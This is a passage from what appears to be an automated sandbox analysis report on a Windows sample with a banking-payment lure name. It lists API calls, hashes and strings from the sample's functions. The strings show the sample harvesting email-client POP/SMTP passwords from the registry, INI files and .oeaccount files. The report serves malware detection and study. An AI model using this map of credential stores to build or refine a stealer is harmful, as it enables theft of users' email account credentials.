                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                                                                          • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                                                                                                                                                          • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                                                                                                                                                                                          Function 00406D1A Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,0040B01C,00000000,00000000,00000000,0044C52F,0044C52F,?,0040CF35,0044C52F), ref: 00406D2C
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                                                                          • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                                                                                                                                                          • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                                                                                                                                                                                          Function 004107F1 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                                                                          • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                                                                                                                                                          • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                                                                                                                                                                                          Function 00410CF3 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • EnumResourceNamesA.KERNEL32(?,?,00410C68,00000000), ref: 00410D02
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: EnumNamesResource
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3334572018-0
                                                                                                                                                                                                                                          • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                                                                                                                                                                          • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                                                                                                                                                                                                                                          Function 00407F90 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CloseFind
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1863332320-0
                                                                                                                                                                                                                                          • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                                                                                                                                                          • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                                                                                                                                                                                          Function 00410A9C Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Open
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 71445658-0
                                                                                                                                                                                                                                          • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                                                                                                                                                                          • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                                                                                                                                                                                                                                          Function 00406F81 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                                                                          • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                                                                                                                                                          • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00

                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                          Function 004047CB Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 49libraryloaderCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A4C,?,?,0040412F,?,?,004041E4), ref: 004047DA
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                          • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                                                                                                                                                                                                          • API String ID: 2238633743-192783356
                                                                                                                                                                                                                                          • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                                                                                                                                                                          • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                                                                                                                                                                                                                                          Function 00402DB3 Relevance: 29.9, APIs: 5, Strings: 12, Instructions: 153registryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                                                                                                                                            • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                                                                                                                                                            • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                                                                                                                                                                                            • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,?), ref: 00402ECA
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,?,?,?), ref: 00402EDD
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,?), ref: 00402F6A
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,?,?,?), ref: 00402F77
                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402FD1
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _mbscpy$QueryValue$CloseOpen
                                                                                                                                                                                                                                          • String ID: DisplayName$EmailAddress$PopAccount$PopLogSecure$PopPassword$PopPort$PopServer$SMTPAccount$SMTPLogSecure$SMTPPassword$SMTPPort$SMTPServer
                                                                                                                                                                                                                                          • API String ID: 52435246-1534328989
                                                                                                                                                                                                                                          • Opcode ID: 9103e5d61916334f965bee58fc86a4c23bf3386d7592c631d61422f450fe5fca
                                                                                                                                                                                                                                          • Instruction ID: 5dbeba4814e3302d002d767d8bad135afcd275429644e03c8fd50da481ddfc04
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9103e5d61916334f965bee58fc86a4c23bf3386d7592c631d61422f450fe5fca
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C512DB1900218BAEB51EB51CD46FDEB77CEF04744F1481A7B908A6191DBB89B84CF98
                                                                                                                                                                                                                                          Function 00406DFC Relevance: 16.6, APIs: 11, Instructions: 58clipboardmemoryfileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 00406E06
                                                                                                                                                                                                                                            • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00406E23
                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00002000,00000001), ref: 00406E34
                                                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00406E41
                                                                                                                                                                                                                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406E54
                                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00406E63
                                                                                                                                                                                                                                          • SetClipboardData.USER32(00000001,00000000), ref: 00406E6C
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00406E74
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00406E80
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00406E8B
                                                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 00406E94
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3604893535-0
                                                                                                                                                                                                                                          • Opcode ID: 39ded4ddef3cc4279da07cdcd0aea708266a9fb2ccc9a22b6ca55318489a3f76
                                                                                                                                                                                                                                          • Instruction ID: a08a85c5be877f1b118c2cb4fdaf5607b5944e2b5e0e57495ee86e8d77b21b2f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 39ded4ddef3cc4279da07cdcd0aea708266a9fb2ccc9a22b6ca55318489a3f76
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9114F39501205EFE7506FB4EC8CB9E7BB8EF05315F144175F506E22A1DB3489158AA9
                                                                                                                                                                                                                                          Function 00406E9F Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemorystringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 00406EA7
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00406EB4
                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040C360,?), ref: 00406EC3
                                                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00406ED0
                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,?,00000001,?,?,?,?,0040C360,?), ref: 00406ED9
                                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00406EE2
                                                                                                                                                                                                                                          • SetClipboardData.USER32(00000001,00000000), ref: 00406EEB
                                                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 00406EFB
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpystrlen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3116012682-0
                                                                                                                                                                                                                                          • Opcode ID: cf45331a199c339a57bf15afb53481a6f1c327c5b86da421185a706dc513e21a
                                                                                                                                                                                                                                          • Instruction ID: 469d781c3ef94e65abf7249e996c377109e97d6fa28bdd4c6fbc6e531372765c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf45331a199c339a57bf15afb53481a6f1c327c5b86da421185a706dc513e21a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FFF0BB3F1002196BD2502FA5FC8CE5B776CDB85B56709413DF906D2252DE34980447F9
                                                                                                                                                                                                                                          Function 004033F0 Relevance: 7.6, Strings: 6, Instructions: 61COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                                                                                                                                                          • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                                                                                                                                                          • API String ID: 3963849919-1658304561
                                                                                                                                                                                                                                          • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                                                                                                                                                          • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                                                                                                                                                                                                          Function 004016FD Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                                                          • String ID: (yE$(yE$(yE
                                                                                                                                                                                                                                          • API String ID: 1865533344-362086290
                                                                                                                                                                                                                                          • Opcode ID: 644c9f1e151c47db51b33def850b2c93cd31f25a94bfc045a311b8f4a1212760
                                                                                                                                                                                                                                          • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 644c9f1e151c47db51b33def850b2c93cd31f25a94bfc045a311b8f4a1212760
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                                                                                                                                                                                                                                          Function 00442D8E Relevance: 191.1, APIs: 8, Strings: 101, Instructions: 307stringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 004431AD
                                                                                                                                                                                                                                          • strncmp.MSVCRT ref: 004431BD
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000002,00000000,?,?,?,?), ref: 00443239
                                                                                                                                                                                                                                          • atoi.MSVCRT(00000000,?,00000002,00000000,?,?,?,?), ref: 0044324A
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00443276
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharMultiWideatoimemcpystrlenstrncmp
                                                                                                                                                                                                                                          • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                                                                                                                                                                                                                          • API String ID: 1895597112-3210201812
                                                                                                                                                                                                                                          • Opcode ID: e45ea68b9b0540497a6261748f05aaaacbd89a4571b9254cd84bfcdfb871a6d6
